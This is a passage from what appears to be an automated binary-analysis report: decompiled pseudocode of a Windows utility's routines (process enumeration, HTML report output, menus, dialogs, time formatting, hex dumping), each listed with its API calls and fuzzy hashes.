                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v32;
                                                                                                                				char _v72;
                                                                                                                				void _v582;
                                                                                                                				long _v584;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t27;
                                                                                                                				wchar_t* _t34;
                                                                                                                				wchar_t* _t42;
                                                                                                                				long* _t43;
                                                                                                                				int _t44;
                                                                                                                				void* _t52;
                                                                                                                				void* _t54;
                                                                                                                				long _t56;
                                                                                                                				long* _t57;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t60 = __eflags;
                                                                                                                				_t52 = __edx;
                                                                                                                				E004095AB( &_v72);
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				E004095FD(_t52, _t60,  &_v72);
                                                                                                                				_t27 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(_v20 <= 0) {
                                                                                                                					L10:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					do {
                                                                                                                						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							_t34 =  &_v584;
                                                                                                                							_push(_t34);
                                                                                                                							_push(_a4);
                                                                                                                							L0040B278();
                                                                                                                							if(_t34 == 0) {
                                                                                                                								L5:
                                                                                                                								_t44 = 0;
                                                                                                                								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                								if(_t54 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_v16 = _v16 & 0;
                                                                                                                									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                										_t44 = 1;
                                                                                                                										CloseHandle(_v16);
                                                                                                                									}
                                                                                                                									CloseHandle(_t54);
                                                                                                                									if(_t44 != 0) {
                                                                                                                										_t56 =  *_t57;
                                                                                                                									} else {
                                                                                                                										goto L9;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                								if(_t42 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t43 =  &(_t42[0]);
                                                                                                                									_push(_t43);
                                                                                                                									_push(_a4);
                                                                                                                									L0040B278();
                                                                                                                									if(_t43 != 0) {
                                                                                                                										goto L9;
                                                                                                                									} else {
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                						L9:
                                                                                                                						_t27 = _v12 + 1;
                                                                                                                						_v12 = _t27;
                                                                                                                					} while (_t27 < _v20);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L12:
                                                                                                                				E004095DA( &_v72);
                                                                                                                				return _t56;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				void _v68;
                                                                                                                				char _v108;
                                                                                                                				void _v160;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t57;
                                                                                                                				wchar_t* _t67;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t73 = __ebx;
                                                                                                                				_t74 = 0xd;
                                                                                                                				_push(9);
                                                                                                                				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                				_t102 = _t100 + 0x18;
                                                                                                                				asm("movsw");
                                                                                                                				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                				_t95 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                						_v8 = _t55;
                                                                                                                						_t57 =  &_v160;
                                                                                                                						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                							_t57 =  &_v68;
                                                                                                                						}
                                                                                                                						_t98 = _a8;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                                						_v12 = _t57;
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                						E0040ADC0(_v28,  &_v108);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                						_t67 =  *(_t73 + 0x64);
                                                                                                                						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                							wcscat(_t67, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                						_push( &_v108);
                                                                                                                						_push(_v12);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t102 = _t102 + 0x1c;
                                                                                                                						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						_t95 = _t95 + 1;
                                                                                                                					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                				struct tagMENUITEMINFOW _v0;
                                                                                                                				int _t24;
                                                                                                                				wchar_t* _t30;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t34;
                                                                                                                				int _t42;
                                                                                                                				signed int _t47;
                                                                                                                				signed int _t48;
                                                                                                                
                                                                                                                				_t36 = __ecx;
                                                                                                                				_t48 = _t47 & 0xfffffff8;
                                                                                                                				E0040B550(0x203c, __ecx);
                                                                                                                				_t24 = GetMenuItemCount(_a8);
                                                                                                                				_t34 = _t24;
                                                                                                                				_t42 = 0;
                                                                                                                				if(_t34 <= 0) {
                                                                                                                					L13:
                                                                                                                					return _t24;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					memset( &_a50, 0, 0x2000);
                                                                                                                					_t48 = _t48 + 0xc;
                                                                                                                					_a36 =  &_a48;
                                                                                                                					_v0.cbSize = 0x30;
                                                                                                                					_a4 = 0x36;
                                                                                                                					_a40 = 0x1000;
                                                                                                                					_a16 = 0;
                                                                                                                					_a48 = 0;
                                                                                                                					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                					if(_t24 == 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					if(_a48 == 0) {
                                                                                                                						L10:
                                                                                                                						_t56 = _a20;
                                                                                                                						if(_a20 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(_a20);
                                                                                                                							_push(_a4);
                                                                                                                							_t24 = E0040605E(_t36, _t56);
                                                                                                                							_t48 = _t48 + 0xc;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t30 = wcschr( &_a48, 9);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						 *_t30 = 0;
                                                                                                                					}
                                                                                                                					_t31 = _a16;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						if(_a12 == 0) {
                                                                                                                							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                							_t32 =  *0x40fe20; // 0x0
                                                                                                                							_t31 = _t32 + 0x11558;
                                                                                                                							__eflags = _t32 + 0x11558;
                                                                                                                						} else {
                                                                                                                							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                							_t31 = _t17;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t24 = E00406025(_t31,  &_a48);
                                                                                                                					_pop(_t36);
                                                                                                                					goto L10;
                                                                                                                					L12:
                                                                                                                					_t42 = _t42 + 1;
                                                                                                                				} while (_t42 < _t34);
                                                                                                                				goto L13;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				int _v24;
                                                                                                                				int _v28;
                                                                                                                				void* _t27;
                                                                                                                				int _t31;
                                                                                                                				void* _t34;
                                                                                                                				int _t37;
                                                                                                                				int _t38;
                                                                                                                				int _t41;
                                                                                                                				int _t50;
                                                                                                                
                                                                                                                				_t34 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                					return _t27;
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v8 = GetSystemMetrics(0x4e);
                                                                                                                					_v12 = GetSystemMetrics(0x4f);
                                                                                                                					_t41 = GetSystemMetrics(0x4c);
                                                                                                                					_t31 = GetSystemMetrics(0x4d);
                                                                                                                					if(_v8 == 0 || _v12 == 0) {
                                                                                                                						_v8 = GetSystemMetrics(0);
                                                                                                                						_v12 = GetSystemMetrics(1);
                                                                                                                						_t41 = 0;
                                                                                                                						_t31 = 0;
                                                                                                                					} else {
                                                                                                                						_v8 = _v8 + _t41;
                                                                                                                						_v12 = _v12 + _t31;
                                                                                                                					}
                                                                                                                					_t50 = _v20 - _v28;
                                                                                                                					if(_t50 > 0x14) {
                                                                                                                						_t38 = _v24;
                                                                                                                						_t37 = _v16 - _t38;
                                                                                                                						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                							_t31 = _t31 + 0xfffffff6;
                                                                                                                							if(_t38 >= _t31) {
                                                                                                                								_t31 = _v28;
                                                                                                                								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t31;
                                                                                                                				}
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				char* _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				int _v64;
                                                                                                                				int _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				wchar_t* _v80;
                                                                                                                				intOrPtr _v84;
                                                                                                                				int _v92;
                                                                                                                				char* _v96;
                                                                                                                				intOrPtr _v104;
                                                                                                                				struct tagOFNA _v108;
                                                                                                                				void _v634;
                                                                                                                				long _v636;
                                                                                                                				void _v2682;
                                                                                                                				char _v2684;
                                                                                                                				void* __ebx;
                                                                                                                				char _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				int _t46;
                                                                                                                				signed short _t54;
                                                                                                                
                                                                                                                				_v636 = 0;
                                                                                                                				memset( &_v634, 0, 0x208);
                                                                                                                				_v2684 = 0;
                                                                                                                				memset( &_v2682, 0, 0x7fe);
                                                                                                                				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                				_v12 = _t37;
                                                                                                                				_t38 =  *0x40cbf0; // 0x67
                                                                                                                				_v8 = _t38;
                                                                                                                				_v28 = E00405B81(0x227);
                                                                                                                				_v24 = L"*.cfg";
                                                                                                                				_v20 = E00405B81(0x228);
                                                                                                                				_v16 = L"*.*";
                                                                                                                				E00405236( &_v2684,  &_v28);
                                                                                                                				_t54 = 0xa;
                                                                                                                				_v60 = E00405B81(_t54);
                                                                                                                				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                				_v48 =  &_v12;
                                                                                                                				_v96 =  &_v2684;
                                                                                                                				_v108 = 0x4c;
                                                                                                                				_v92 = 0;
                                                                                                                				_v84 = 1;
                                                                                                                				_v80 =  &_v636;
                                                                                                                				_v76 = 0x104;
                                                                                                                				_v72 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_v56 = 0x80806;
                                                                                                                				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                				if(_t46 != 0) {
                                                                                                                					wcscpy( &_v636, _v80);
                                                                                                                					return E0040365E(__edi, 1,  &_v636);
                                                                                                                				}
                                                                                                                				return _t46;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                                				long _v276;
                                                                                                                				long _v532;
                                                                                                                				FILETIME* _t15;
                                                                                                                
                                                                                                                				_t15 = __eax;
                                                                                                                				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                						wcscpy(_a4,  &_v276);
                                                                                                                						wcscat(_a4, " ");
                                                                                                                						wcscat(_a4,  &_v532);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L5:
                                                                                                                					wcscpy(_a4, 0x40c4e8);
                                                                                                                				}
                                                                                                                				return _a4;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                				void _v514;
                                                                                                                				long _v516;
                                                                                                                				wchar_t* _t34;
                                                                                                                				signed int _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t34 = __edi;
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				 *__edi =  *__edi & 0x00000000;
                                                                                                                				_t37 = _t36 + 0xc;
                                                                                                                				_t35 = 0;
                                                                                                                				do {
                                                                                                                					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                					_push(L"%2.2X");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v516);
                                                                                                                					L0040B1EC();
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					if(_t35 > 0) {
                                                                                                                						wcscat(_t34, " ");
                                                                                                                					}
                                                                                                                					if(_a8 > 0) {
                                                                                                                						asm("cdq");
                                                                                                                						if(_t35 % _a8 == 0) {
                                                                                                                							wcscat(_t34, L"  ");
